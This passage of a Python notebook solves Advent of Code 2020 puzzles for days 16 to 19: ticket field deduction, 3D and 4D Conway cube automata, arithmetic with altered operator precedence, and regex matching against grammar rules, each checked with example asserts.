            for n in range(lo, hi+1):
                valid_nums.add(n)
    #log.info(f"valid_nums={valid_nums}")
    invalid_nums = []
    for this_ticket in ticket_info['other_tickets']:
        for n in this_ticket:
            if not n in valid_nums:
                invalid_nums.append(n)
    ticket_error_rate = sum(invalid_nums)
    log.info(f"ticket_error_rate={ticket_error_rate} invalid_nums={invalid_nums}")
    return ticket_error_rate
# In[ ]:
# Day 16 part a: example then real input.
ticket_info = parse_day16_input(tests)
solve16a(ticket_info)
# In[ ]:
ins = aoc.read_file_to_str('./in/day16.in')
ticket_info = parse_day16_input(ins)
solve16a(ticket_info)
# In[ ]:
print("Day 16 b")
# Second example from the part-b statement (field-order deduction).
tests2 = """
class: 0-1 or 4-19
row: 0-5 or 8-19
seat: 0-13 or 16-19
your ticket:
11,12,13
nearby tickets:
3,9,18
15,1,5
5,14,9
""".strip()
# In[ ]:
def solve16b(ticket_info):
    """Day 16 part b: deduce which field belongs to which ticket position.

    Discards invalid tickets, computes candidate fields per position, then
    iteratively pins down positions with exactly one candidate (constraint
    elimination). Returns {field_name: position_index}.
    NOTE(review): mutates ticket_info['other_tickets'] in place (removes
    invalid tickets).
    """
    #log.info(f"ticket_info={ticket_info}")
    fields = ticket_info['fields']
    my_ticket = ticket_info['my_ticket']
    other_tickets = ticket_info['other_tickets']
    all_tickets = other_tickets.copy()
    all_tickets.append(my_ticket)
    log.info(f"[solve16b] start all_tickets_len={len(all_tickets)}")
    # valid numbers per field, plus the union over all fields
    all_valid_nums = []
    valid_nums = {}
    for field in fields.keys():
        valid_nums[field] = []
        for entry in fields[field]:
            min, max = entry  # NOTE(review): shadows builtins min/max inside this loop
            for n in range(min, max+1):
                valid_nums[field].append(n)
                all_valid_nums.append(n)
    for field in valid_nums.keys():
        valid_nums[field] = sorted(set(valid_nums[field]))
    all_valid_nums = sorted(set(all_valid_nums))
    log.trace(f"valid_nums={valid_nums}")
    # drop tickets containing any value valid for no field at all
    invalid_tickets = []
    for this_ticket in all_tickets:
        for n in this_ticket:
            if not n in all_valid_nums:
                invalid_tickets.append(this_ticket)
                break
    for this_ticket in invalid_tickets:
        log.debug(f"removing invalid ticket {this_ticket}")
        other_tickets.remove(this_ticket)
        all_tickets.remove(this_ticket)
    log.info(f"[solve16b] weedd all_tickets_len={len(all_tickets)}")
    num_fields = len(ticket_info['fields'])
    log.info(f"[solve16b] num_fields={num_fields}")
    assert( len(my_ticket) == num_fields)
    # candidate fields per ticket position: field qualifies if every ticket's
    # value at that position is in the field's valid set
    idx_maybe_field = {}
    for idx in range(num_fields):
        idx_maybe_field[idx] = []
        ticket_nums_at_idx = mapl(lambda it: it[idx], all_tickets)
        for field in fields:
            if set(ticket_nums_at_idx).issubset(set(valid_nums[field])):
                log.debug(f"idx={idx} field={field} OK for values={ticket_nums_at_idx}")
                idx_maybe_field[idx].append(field)
    # elimination: repeatedly fix positions that have exactly one candidate
    idx_map = {}
    for i in range(1, 1001):
        lens = mapl(lambda it: len(it[1]), idx_maybe_field.items()) # index-order is implicit
        log.trace(lens)
        found_this_loop = []
        for idx, l in enumerate(lens):
            if l == 0:
                continue
            #if not idx in idx_maybe_field.keys(): # already found
            #    continue
            if l == 1:
                fieldnm = idx_maybe_field[idx][0]
                found_this_loop.append(fieldnm)
                idx_map[fieldnm] = idx
                idx_maybe_field[idx] = []
        log.debug(f"loop {i} idx_map={idx_map}")
        # remove just-fixed fields from all remaining candidate lists
        for f in found_this_loop:
            for k in idx_maybe_field.keys():
                if f in idx_maybe_field[k]:
                    idx_maybe_field[k].remove(f)
        if len(idx_map.keys()) >= num_fields:
            break
        if i >= 1000:
            raise Exception("FAILSAFE")
    return idx_map
# In[ ]:
# Day 16 part b: examples, then multiply my-ticket values of 'departure*' fields.
ticket_info = parse_day16_input(tests)
solve16b(ticket_info)
# In[ ]:
ticket_info = parse_day16_input(tests2)
solve16b(ticket_info)
# In[ ]:
ticket_info = parse_day16_input(ins)
idx_map = solve16b(ticket_info)
my_ticket = ticket_info['my_ticket']
f = 1
for k,v in idx_map.items():
    if k.startswith('departure'):
        log.info(f"field-idx={[k, v]} myticket-val={my_ticket[v]}")
        f *= my_ticket[v]
log.info(f"Day 16 b solution: {f}") # not 930240
# ### Day 17: Conway Cubes
# In[ ]:
# Day 17 example start pattern (2d slice at z=0), as a list of char-lists.
tests = """
.#.
..#
###
""".strip()
tests = mapl(list, tests.split("\n"))
log.info(tests)
# In[ ]:
# solution TODO
# In[ ]:
class Grid3d:
    """Grid of 3d-cells, discrete 3d space, each cell represents a cube.

    Active cells are stored sparsely as (x, y, z) tuples in self.points.
    """
    def __init__(self):
        log.debug("[Grid3d] constructor.")
    def initialize(self, pattern):
        """Seed the grid from a 2d '#'/'.' pattern placed on the z=0 plane."""
        self.pattern0 = pattern
        self.points = []
        z = 0
        for y in range(len(pattern)):
            for x in range(len(pattern[0])):
                if pattern[y][x] == '#':
                    self.points.append( (x, y, z) )
    def report(self):
        """Short debug summary: number of active points plus the point list."""
        return f"#pts={len(self.points)} {self.points}"
    def get_layer(self, z):
        """Return all active points on the given z plane."""
        return [pt for pt in self.points if pt[2] == z]
    def get_zrange(self):
        """Inclusive range of occupied z levels.

        BUGFIX: was range(min(zs), max(zs)-min(zs)+1), which is wrong whenever
        min(zs) != 0; now consistent with Grid4d.get_zrange.
        """
        zs = [pt[2] for pt in self.points]
        return range(min(zs), max(zs)+1)
    def get_layer_repr(self, z):
        """ASCII rendering of one z layer, offset so all coordinates are >= 0."""
        xs = [pt[0] for pt in self.points]
        ys = [pt[1] for pt in self.points]
        dim_x, dim_y = [ max(xs) - min(xs) + 1, max(ys) - min(ys) + 1 ]
        x_ofst = -min(xs)
        y_ofst = -min(ys)
        rows = []
        for y in range(0, max(ys)+y_ofst+1):
            s = ''
            for x in range(0, max(xs)+x_ofst+1):
                if (x-x_ofst, y-y_ofst, z) in self.points:
                    s += '#'
                else:
                    s += '.'
            rows.append(s)
        return f"grid-lvl@z={z} dims={[dim_x, dim_y]} extents={self.get_extents()} x-ofst={-x_ofst} y-ofst={-y_ofst}\n" +str.join("\n", rows)
    def get_num_neighbors(self, pt):
        """Count active cells among the 26 neighbors of pt (pt itself excluded)."""
        xp, yp, zp = pt
        num_neighbors = 0
        for z in range(zp-1, zp+2):
            for y in range(yp-1, yp+2):
                for x in range(xp-1, xp+2):
                    if (x, y, z) == pt: # identity, given point itself
                        continue
                    if (x, y, z) in self.points:
                        num_neighbors += 1
        return num_neighbors
    def get_extents(self):
        """Per-axis [min, max] of the active points: [[x...],[y...],[z...]]."""
        xs = [pt[0] for pt in self.points]
        ys = [pt[1] for pt in self.points]
        zs = [pt[2] for pt in self.points]
        return [[min(xs), max(xs)], [min(ys), max(ys)], [min(zs), max(zs)]]
class ConwayCubeGrid(Grid3d):
    """Conway cellular automaton in 3d, inheriting from class Grid3d."""
    def __init__(self):
        # NOTE(review): does not call super().__init__(); Grid3d.__init__ only logs.
        log.debug("[ConwayCubeGrid] constructor.")
        self.t = 0  # generation counter
    def iterate(self, steps=1):
        """Advance the automaton by `steps` generations.

        Rules: an active cell stays active with 2 or 3 active neighbors;
        an inactive cell becomes active with exactly 3 active neighbors.
        Scans one cell beyond the current extents in every direction so the
        pattern can grow outward.
        """
        for i in range(steps):
            exts = self.get_extents()
            new_pts = copy.deepcopy(self.points)
            for x in range(exts[0][0]-1, exts[0][1]+2):
                for y in range(exts[1][0]-1, exts[1][1]+2):
                    #if x == 0:
                    #    log.trace(f"iter-row {y}")
                    for z in range(exts[2][0]-1, exts[2][1]+2):
                        pt = (x, y, z)
                        is_active = pt in self.points
                        #if is_active:
                        #    log.info(f"iterate: pt={pt} was active")
                        nn = self.get_num_neighbors(pt)
                        if is_active:
                            if not (nn in [2, 3]):
                                #log.trace(f"iter-remove {pt}")
                                new_pts.remove( pt )
                        else:
                            if nn == 3:
                                #log.trace(f"iter-append {pt}")
                                new_pts.append( pt )
            self.points = new_pts
            self.t += 1
# In[ ]:
# Sanity-check Grid3d neighbor counting on the day-17 example pattern.
grid = Grid3d()
log.info(f"grid={grid}")
grid.initialize(tests)
log.info(f"grid rpt:\n{grid.report()}")
assert 1 == grid.get_num_neighbors( (0,0,0) )
assert 2 == grid.get_num_neighbors( (2,0,0) )
assert 5 == grid.get_num_neighbors( (1,1,0) )
assert 0 == grid.get_num_neighbors( (-2,-1,0) )
grid.get_extents()
# In[ ]:
# Same checks on the automaton subclass, then iterate 6 generations verbosely.
grid = ConwayCubeGrid()
log.info(f"grid={grid}")
grid.initialize(tests)
#log.info(f"grid rpt:\n{grid.report()}")
assert 1 == grid.get_num_neighbors( (0,0,0) )
assert 2 == grid.get_num_neighbors( (2,0,0) )
assert 5 == grid.get_num_neighbors( (1,1,0) )
assert 0 == grid.get_num_neighbors( (-2,-1,0) )
grid.get_extents()
log.info(f"grid @ t={grid.t} extents={grid.get_extents()} numpts={len(grid.points)}")
log.info(grid.get_layer_repr(0))
#res = grid.get_layer(0)
for i in range(1, 7):
    grid.iterate()
    log.info(f"Iterated: grid @ t={grid.t} extents={grid.get_extents()} numpts={len(grid.points)}")
    for z in grid.get_zrange():
        ##log.info(f"grid @ t={grid.t} pts@z=0 {res}")
        #log.info(grid.get_layer_repr(z))
        True
# In[ ]:
# Example expects 112 active cubes after 6 cycles.
grid = ConwayCubeGrid()
grid.initialize(tests)
grid.iterate(steps=6)
assert( 6 == grid.t )
assert( 112 == len(grid.points) )
# In[ ]:
# Day 17 part a on the real input: 6 cycles of the 3d automaton.
ins = aoc.read_file_to_str('in/day17.in').strip()
log.info(f"pattern=\n{ins}")
ins = mapl(list, ins.split("\n"))
grid = ConwayCubeGrid()
grid.initialize(ins)
grid.iterate(steps=6)
assert( 6 == grid.t )
res = len(grid.points)
log.info(f"Day 17 a solution: num points after 6 iterations: {res}")  # BUGFIX: label said "Day 18"
class Grid4d:
    """Grid of 4d-cells, each cell represents a 4d-cube, a hypercube, a tesseract.

    Active cells are kept sparsely as (x, y, z, w) tuples in self.points.
    """
    def __init__(self):
        log.debug("[Grid4d] constructor.")
    def initialize(self, pattern):
        """Seed the grid from a 2d '#'/'.' pattern on the z=0, w=0 plane."""
        self.pattern0 = pattern
        active = []
        z, w = 0, 0
        for y, row in enumerate(pattern):
            for x in range(len(pattern[0])):
                if row[x] == '#':
                    active.append( (x, y, z, w) )
        self.points = active
    def report(self):
        """Short debug summary: point count plus the point list."""
        return f"#pts={len(self.points)} {self.points}"
    def get_layer(self, z, w):
        """All active points on the given (z, w) plane."""
        return [p for p in self.points if p[2] == z and p[3] == w]
    def get_zrange(self):
        """Inclusive range of occupied z levels."""
        zs = [p[2] for p in self.points]
        return range(min(zs), max(zs)+1)
    def get_wrange(self):
        """Inclusive range of occupied w levels."""
        ws = [p[3] for p in self.points]
        return range(min(ws), max(ws)+1)
    def get_layer_repr(self, z, w):
        """ASCII rendering of one (z, w) layer, offset so coordinates are >= 0."""
        xs = [p[0] for p in self.points]
        ys = [p[1] for p in self.points]
        dim_x, dim_y = [ max(xs) - min(xs) + 1, max(ys) - min(ys) + 1 ]
        x_ofst = -min(xs)
        y_ofst = -min(ys)
        rows = []
        for y in range(0, max(ys)+y_ofst+1):
            row = ''.join(
                '#' if (x-x_ofst, y-y_ofst, z, w) in self.points else '.'
                for x in range(0, max(xs)+x_ofst+1))
            rows.append(row)
        return f"grid-lvl@[z,w]={[z,w]} dims={[dim_x, dim_y]} extents={self.get_extents()}" + f"x-ofst={-x_ofst} y-ofst={-y_ofst}\n" +str.join("\n", rows)
    def get_num_neighbors(self, pt):
        """Count active cells among the 80 hyper-neighbors of pt (pt excluded)."""
        xp, yp, zp, wp = pt
        candidates = itertools.product(
            range(xp-1, xp+2), range(yp-1, yp+2),
            range(zp-1, zp+2), range(wp-1, wp+2))
        return sum(1 for cand in candidates if cand != pt and cand in self.points)
    def get_extents(self):
        """Per-axis [min, max] of the active points."""
        xs = [p[0] for p in self.points]
        ys = [p[1] for p in self.points]
        zs = [p[2] for p in self.points]
        ws = [p[3] for p in self.points]
        return [[min(xs), max(xs)], [min(ys), max(ys)], [min(zs), max(zs)], [min(ws), max(ws)]]
class ConwayTesseractGrid(Grid4d):
    """Conway cellular automaton in 4d, inheriting from class Grid4d."""
    def __init__(self):
        # NOTE(review): does not call super().__init__(); Grid4d.__init__ only logs.
        log.debug("[ConwayTesseractGrid] constructor.")
        self.t = 0  # generation counter
    def iterate(self, steps=1):
        """Advance the 4d automaton by `steps` generations.

        Same rules as the 3d version (stay active on 2-3 neighbors, become
        active on exactly 3), over the 4d neighborhood; scans one cell beyond
        current extents on every axis.
        """
        for i in range(steps):
            exts = self.get_extents()
            new_pts = copy.deepcopy(self.points)
            for x in range(exts[0][0]-1, exts[0][1]+2):
                for y in range(exts[1][0]-1, exts[1][1]+2):
                    #if x == 0:
                    #    log.trace(f"iter-row {y}")
                    for w in range(exts[3][0]-1, exts[3][1]+2):
                        for z in range(exts[2][0]-1, exts[2][1]+2):
                            pt = (x, y, z, w)
                            is_active = pt in self.points
                            #if is_active:
                            #    log.info(f"iterate: pt={pt} was active")
                            nn = self.get_num_neighbors(pt)
                            if is_active:
                                if not (nn in [2, 3]):
                                    #log.trace(f"iter-remove {pt}")
                                    new_pts.remove( pt )
                            else:
                                if nn == 3:
                                    #log.trace(f"iter-append {pt}")
                                    new_pts.append( pt )
            self.points = new_pts
            self.t += 1
# In[ ]:
# Day 17 part b: 4d automaton on the example; expect 848 cells after 6 cycles.
grid = ConwayTesseractGrid()
log.info(f"grid={grid}")
grid.initialize(tests)
#log.info(f"grid rpt:\n{grid.report()}")
assert 1 == grid.get_num_neighbors( (0,0,0,0) )
assert 2 == grid.get_num_neighbors( (2,0,0,0) )
assert 5 == grid.get_num_neighbors( (1,1,0,0) )
assert 0 == grid.get_num_neighbors( (-2,-1,0,0) )
grid.get_extents()
log.info(f"grid @ t={grid.t} extents={grid.get_extents()} numpts={len(grid.points)}")
log.info(grid.get_layer_repr(0, 0))
#res = grid.get_layer(0)
grid.iterate()
log.info(grid.get_layer_repr(-1, -1))
log.info(grid.get_layer_repr(0, 0))
log.info(grid.get_layer_repr(1, 1))
grid.iterate()
log.info(grid.get_layer_repr(-2, -2))
log.info(grid.get_layer_repr(0, 0))
log.info(grid.get_layer_repr(2, 0))
grid.iterate(steps=4)
assert( 6 == grid.t )
assert( 848 == len(grid.points) )
# In[ ]:
# Day 17 part b on the real input (slow: ~226s); gated behind EXEC_RESOURCE_HOGS.
if EXEC_RESOURCE_HOGS: # took 226 seconds on my notebook
    grid = ConwayTesseractGrid()
    grid.initialize(ins)
    start_tm = int(time.time())
    for i in range(1, 7):
        grid.iterate(steps=1)
        npts = len(grid.points)
        took_tm = int(time.time()) - start_tm
        log.info(f"after grid iteration {i}: num-points={npts:,} after {took_tm}s")
    assert( 6 == grid.t )
    res = len(grid.points)
    log.info(f"Day 17 b solution: num points after 6 iterations: {res}")  # BUGFIX: label said "Day 18"
# ### Day 18: : Operation Order
# In[ ]:
# This definitely is/would be LISP territory !
# In[ ]:
def parse_equation18a(s):
    """Tokenize a single "equation" string into a list of ints and operator/paren chars."""
    operators = ['+','-','*','/','(',')']
    # split *around* every operator/paren so the delimiters survive as tokens
    raw = re.split(r'(?=[\+\-\*\/\(\)])|(?<=[\+\-\*\/\(\)])', s)
    tokens = [tok.strip() for tok in raw]
    tokens = [tok for tok in tokens if tok != '']
    tokens = [tok if tok in operators else int(tok) for tok in tokens]
    log.debug(f"[parse_equation18a] returns={tokens}")
    return tokens
def rindex_list(elem, l):
    """Return the index of the rightmost occurrence of elem in list l.

    Raises ValueError (via max on an empty generator) when elem is absent,
    matching list.index semantics.
    """
    return max(idx for idx, val in enumerate(l) if val == elem)
def find_matching_close_paren_idx(lst):
    """Assumes input list starting with '(', finds matching ')' and returns its index.
    If not found, returns -1."""
    depth = 0
    for pos, tok in enumerate(lst):
        if tok == '(':
            depth += 1
        elif tok == ')':
            depth -= 1
        # depth drops below 1 exactly when the opening paren is balanced
        if depth < 1:
            return pos
    return -1
def calc18a(l):
    """Day 18 part a: evaluate a token list left-to-right, + and * with EQUAL
    precedence; parenthesized sub-lists are evaluated by recursion.

    l: token list as produced by parse_equation18a (ints and '+','*','(',')').
    Returns the integer result.
    """
    log.debug(f"[calc18a] l={l}")
    rest = l
    ict = 0  # iteration counter (debug only)
    while( len(rest)>1 ):
        ict += 1
        lval, rest = [rest[0], rest[1:]]
        log.trace(f" in [lval, rest]={[lval, rest]} rest-len={len(rest)}")
        if lval == '(':
            # left value is a parenthesized group: recurse into it
            rest = [lval] + rest # re-assemble
            ridx = find_matching_close_paren_idx(rest)
            sublst = rest[1:ridx] # last/rightmost index of closing parens
            new_rest = rest[ridx+1:]
            log.trace(f"calcparen lval={lval} sublst={sublst} new-rest={new_rest} from={rest}")
            lval = calc18a(sublst.copy())
            rest = [lval] + new_rest
        else:
            # operator mode: consume operator and right value
            op, rest = [rest[0], rest[1:]]
            rval = rest[0]
            log.trace(f" op-mode {[op, rest]} lval={lval} op={op} rval={rval} all-rest={rest}")
            if rval == '(':
                # right value is a parenthesized group: recurse into it
                idx = find_matching_close_paren_idx(rest)
                sublst = rest[1:idx]
                new_rest = rest[idx+1:]
                log.trace(f"calcparen (lval={lval}) rval sublst={sublst} new-rest={new_rest} from {rest}")
                rval = calc18a(sublst.copy())
                rest = [op] + new_rest
                log.trace(f" calcparen rval={rval} sublst={sublst} new-rest={new_rest} from {rest}")
            if op == '+':
                lval += rval
                rest = [lval] + rest[1:]
            elif op == '*':
                lval *= rval
                rest = [lval] + rest[1:]
            else:
                raise Exception(f"unhandled operator {op}")
        log.trace(f" loop-end: lval={lval}; new-list={rest}")
        if len(rest)>1 and rest[1] == ')': # found result of parens in val
            log.debug(" next is ')' group closing, break")
            break
    log.debug(f" returning val={lval}; from={l}")
    return lval
# In[ ]:
#log.setLevel(aoc.LOGLEVEL_TRACE)
#log.setLevel(logging.INFO)
# Day 18 part a: examples from the puzzle statement.
test = """
1 + 2 * 3 + 4 * 5 + 6
""".strip()
testlst = parse_equation18a(test)
res = calc18a(testlst)
print("test result", res)
# In[ ]:
test = """
1 + (2 * 3) + (4 * (5 + 6))
""".strip()
assert( 51 == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
2 * 3 + (4 * 5)
""".strip()
res = calc18a(parse_equation18a(test))
assert( 26 == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
5 + (8 * 3 + 9 + 3 * 4 * 3)
""".strip()
expectd = 437
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))
""".strip()
expectd = 12240
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
(1 + 2)
""".strip()
expectd = 3
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2
""".strip()
expectd = 13632
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
# Real input: sum of all evaluated equations.
ins = aoc.read_file_to_list('./in/day18.in')
csum = 0
for eqstr in ins:
    csum += calc18a(parse_equation18a(eqstr))
log.info(f"Day 18 a solution: equations cumsum={csum}")
# In[ ]:
print("Day 18 b")
def calc18b(l):
    """Day 18 part b: evaluate a token list where '+' binds TIGHTER than '*'.

    Same scanning scheme as calc18a, but on '*' the whole remaining tail is
    evaluated recursively first (postponing the multiplication), which gives
    '+' higher precedence.
    """
    log.debug(f"[calc18b] l={l}")
    rest = l
    ict = 0  # iteration counter (debug only)
    while( len(rest)>1 ):
        ict += 1
        lval, rest = [rest[0], rest[1:]]
        log.trace(f" >in [lval, rest]={[lval, rest]} rest-len={len(rest)}")
        if lval == '(':
            # left value is a parenthesized group: recurse into it
            rest = [lval] + rest # re-assemble
            ridx = find_matching_close_paren_idx(rest)
            sublst = rest[1:ridx] # last/rightmost index of closing parens
            new_rest = rest[ridx+1:]
            log.trace(f"calcparen lval={lval} sublst={sublst} new-rest={new_rest} from={rest}")
            lval = calc18b(sublst.copy())
            rest = [lval] + new_rest
            log.trace(f" cprv new-rest={rest}")
        else:
            op, rest = [rest[0], rest[1:]]
            rval = rest[0]
            log.trace(f" op-mode {[op, rest]} lval={lval} op={op} rval={rval} all-rest={rest}")
            if rval == '(':
                # right value is a parenthesized group: recurse into it
                idx = find_matching_close_paren_idx(rest)
                sublst = rest[1:idx]
                new_rest = rest[idx+1:]
                log.trace(f"calcparen (lval={lval}) rval sublst={sublst} new-rest={new_rest} from {rest}")
                rval = calc18b(sublst.copy())
                rest = [rval] + new_rest
                log.trace(f" calcparen rval={rval} sublst={sublst} new-rest={new_rest} from {rest}")
            if op == '+':
                lval += rval
                rest = [lval] + rest[1:]
                log.debug(f" (+)=> rval={rval}, lval={lval}, new rest={rest}")
            elif op == '*':
                # postpone multiplication ! Rather, recurse fun-call for r-value
                log.debug(f" PROD in [lval, op, rest]={[lval, op, rest]} rest-len={len(rest)}")
                if len(rest) > 1:
                    rval = calc18b(rest.copy())
                lval *= rval
                rest = []
                log.debug(f" (*)=> rval={rval}, lval={lval}, new rest={rest}")
            else:
                raise Exception(f"unhandled operator {op}")
        log.trace(f" loop-end: lval={lval}; new-list={rest}")
        if len(rest)>1 and rest[1] == ')': # found result of parens in val
            log.debug(" next is ')' group closing, break")
            break
    log.debug(f"[calc18b] RC={lval} from {l}")
    return lval
# In[ ]:
# Day 18 part b: examples with '+' binding tighter than '*'.
test = """
1 + 2 * 3 + 4 * 5 + 6
""".strip()
testlst = parse_equation18a(test)
res = calc18b(testlst)
print("test result", res)
# In[ ]:
test = """
1 + (2 * 3) + (4 * (5 + 6))
""".strip()
expectd = 51
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
2 * 3 + (4 * 5)
""".strip()
expectd = 46
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
5 + (8 * 3 + 9 + 3 * 4 * 3)
""".strip()
expectd = 1445
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))
""".strip()
expectd = 669060
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2
""".strip()
expectd = 23340
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
# Real input: sum of all part-b evaluated equations.
ins = aoc.read_file_to_list('./in/day18.in')
csum = 0
for eqstr in ins:
    csum += calc18b(parse_equation18a(eqstr))
log.info(f"Day 18 b solution: equations cumsum={csum}")
# ### Day 19: Monster Messages
#
# The simplest/most elegant approach would be to create a grammar for this problem and parse the rules (lex/yacc) etc.
# But as a shortcut today I fell back on only using/constructing text regular expressions.
# In[ ]:
def parse_day19_rules(s):
    """Split day-19 rule text into [rule_number, rule_expression] string pairs."""
    return [line.split(': ') for line in s.split("\n")]
def parse_day19(s):
    """Split raw day-19 input (rules block, blank line, samples block)
    into (rules, samples): parsed rule pairs and a list of sample strings."""
    rules, samples = s.strip().split("\n\n")
    rules = parse_day19_rules(rules)
    samples = samples.split("\n")
    log.debug(f"parsed:\n rules=\n{rules}\n samples=\n{samples}")
    return rules, samples
def solve_day19(rules, max_depth=30, part=1):
    """Expand day-19 grammar rules into regular-expression strings.

    rules:     list of [rule_num, rule_expr] string pairs
    max_depth: upper bound on substitution passes
    part:      1 = rules as given; 2 = rules 8/11 become recursive and are
               approximated by bounded regex repetition when expansion stalls
    Returns dict rule_num -> regex string; pd['0'] is the full matcher.
    """
    log.debug(f"[solve19b] started")
    pd = {}             # rule_num -> fully-expanded regex fragment
    rules_keys = []
    # seed with terminal rules of the form: 4: "a"
    for rule in rules:
        rule_num, rule_expr = rule
        rules_keys.append(rule_num)
        # BUGFIX: condition was `rule_expr.endswith('')`, which is always True;
        # the intended check is for a closing double quote.
        if rule_expr.startswith('"') and rule_expr.endswith('"'):
            log.debug(f" added key={rule_num} rule={rule_expr}")
            pd[rule_num] = rule_expr.replace('"', '')
    missing_rules_keys = rules_keys.copy()
    for k in pd.keys():
        missing_rules_keys.remove(k)
    # fixed-point: substitute already-resolved sub-rules until no progress
    for i in range(1, max_depth+2):
        log.debug(f" loop#={i}")
        found_new_key = False
        for rule in rules:
            rule_num, rule_expr = rule
            if part == 2: # apply part 2 conditions:
                if rule_num == '8':
                    rule_expr = '42 | 42 8'
                elif rule_num == '11':
                    rule_expr = '42 31 | 42 11 31'
            if not rule_num in pd.keys():
                ree = rule_expr.split(' ')
                rules_contained = set(filterl(lambda it: it != '|', ree))
                log.trace(f"unparsed rule {rule}, rules_contained={rules_contained}")
                if set(rules_contained).issubset(pd.keys()):
                    log.trace(f"can add {ree}")
                    r = str.join('', mapl(lambda it: pd[it] if it in pd.keys() else it, ree))
                    pd[rule_num] = '(' + r + ')'
                    found_new_key = True
                    missing_rules_keys.remove(rule_num)
                    log.debug(f" added key={rule_num} rule={r}")
                else:
                    log.trace(f"can't add {ree}")
        if not found_new_key:
            # stalled: in part 2 the recursive rules 8/11 can never resolve,
            # so approximate them with explicit regex repetition
            if not '0' in pd.keys():
                log.debug(f"rule0 not found after {i} loops, rules-found={sorted(pd.keys())}")
                log.debug(f" rules_missing={sorted(missing_rules_keys)}")
                if part == 2:
                    log.debug(f" rules[42]={pd['42']}")
                    log.debug(f" rules[31]={pd['31']}")
                    # THIS is the re secret sauce expressing ca. conditions:
                    # > rule_expr = '42 | 42 8' :: 1..n of pattern 42
                    pd['8'] = f"({pd['42']})+"
                    # > rule_expr = '42 31 | 42 11 31' :: 1..n of pattern 42 followd by 31
                    #pd['11'] = f"({pd['42']})+({pd['31']})+" # the first and second + repeat count have to be same
                    # equal repeat counts cannot be expressed by a regular
                    # expression, so enumerate counts 1..5 as alternatives
                    # (NOTE: this `i` shadows the outer pass counter; harmless
                    # since the outer loop breaks right below)
                    ors = []
                    for i in range(1, 6):
                        pl = pd['42']
                        pr = pd['31']
                        ors.append(pl*i+pr*i)
                    pd['11'] = f"({str.join('|', ors)})"
                    # > 8 11
                    pd['0'] = f"{pd['8']}{pd['11']}"
                    log.debug(f" rules[8]={pd['8']}")
                    log.debug(f" len(rules[11])={len(pd['11'])}")
                    log.debug(f" len(rules[0])={len(pd['0'])}")
            break
    log.debug(f"[solve19b] parsed-dict={pd}")
    return pd
# In[ ]:
# Day 19 part a: tiny grammar first, then the statement's example, then input.
tests = """
0: 1 2
1: "a"
2: 1 3 | 3 1
3: "b"
""".strip()
# In[ ]:
log.setLevel(logging.INFO)
rules = parse_day19_rules(tests)
log.info(f"test: parsed rules\n{rules}")
pd = solve_day19(rules)
rule0 = pd['0']
assert( re.match(rule0, "aab") )
assert( re.match(rule0, "aba") )
assert( not re.match(rule0, "bba") )
# In[ ]:
tests = """
0: 4 1 5
1: 2 3 | 3 2
2: 4 4 | 5 5
3: 4 5 | 5 4
4: "a"
5: "b"
""".strip()
rules = parse_day19_rules(tests)
log.info(f"test: parsed rules\n{rules}")
pd = solve_day19(rules)
log.info(f"tests parse-dir={pd}")
# anchor the pattern so only full-string matches count
rule0='^' + pd['0'] + '$'
samples = "aaaabb,aaabab,abbabb,abbbab,aabaab,aabbbb,abaaab,ababbb".split(',')
for sample in samples:
    assert( re.match(rule0, sample) )
assert( not re.match(rule0, "baaabb") )
assert( not re.match(rule0, "ababba") )
# In[ ]:
tests = """
0: 4 1 5
1: 2 3 | 3 2
2: 4 4 | 5 5
3: 4 5 | 5 4
4: "a"
5: "b"
ababbb
bababa
abbbab
aaabbb
aaaabbb
""".strip()
# In[ ]:
#ababbb and abbbab match
#bababa, aaabbb, and aaaabbb
rules, samples = parse_day19(tests)
pd = solve_day19(rules)
log.info(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
smatching = 0
for sample in samples:
    if re.match(rule0, sample):
        #log.info(f"{sample} matches {rule0}")
        smatching +=1
    else:
        #log.info(f"{sample} NOmatch {rule0}")
        True
log.info(f"matching-samples-#={smatching}")
assert ( smatching == 2)
# In[ ]:
# Real input: count samples fully matching rule 0.
ins = aoc.read_file_to_str('./in/day19.in')
rules, samples = parse_day19(ins)
pd = solve_day19(rules)
log.debug(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
log.info(f"parsed-rules, len(rule0)={len(rule0)}")
smatching = 0
for sample in samples:
    if re.match(rule0, sample):
        smatching +=1
        #log.info(f"{sample} matches {rule0}")
    #else:
    #    log.info(f"{sample} NOmatch {rule0}")
log.info(f"matching-samples-#={smatching}")
print("Day 19 b")
# Day 19 part b example (recursive rules 8/11); expects 12 matching samples.
tests = """
42: 9 14 | 10 1
9: 14 27 | 1 26
10: 23 14 | 28 1
1: "a"
11: 42 31
5: 1 14 | 15 1
19: 14 1 | 14 14
12: 24 14 | 19 1
16: 15 1 | 14 14
31: 14 17 | 1 13
6: 14 14 | 1 14
2: 1 24 | 14 4
0: 8 11
13: 14 3 | 1 12
15: 1 | 14
17: 14 2 | 1 7
23: 25 1 | 22 14
28: 16 1
4: 1 1
20: 14 14 | 1 15
3: 5 14 | 16 1
27: 1 6 | 14 18
14: "b"
21: 14 1 | 1 14
25: 1 1 | 1 14
22: 14 14
8: 42
26: 14 22 | 1 20
18: 15 15
7: 14 5 | 1 21
24: 14 1
abbbbbabbbaaaababbaabbbbabababbbabbbbbbabaaaa
bbabbbbaabaabba
babbbbaabbbbbabbbbbbaabaaabaaa
aaabbbbbbaaaabaababaabababbabaaabbababababaaa
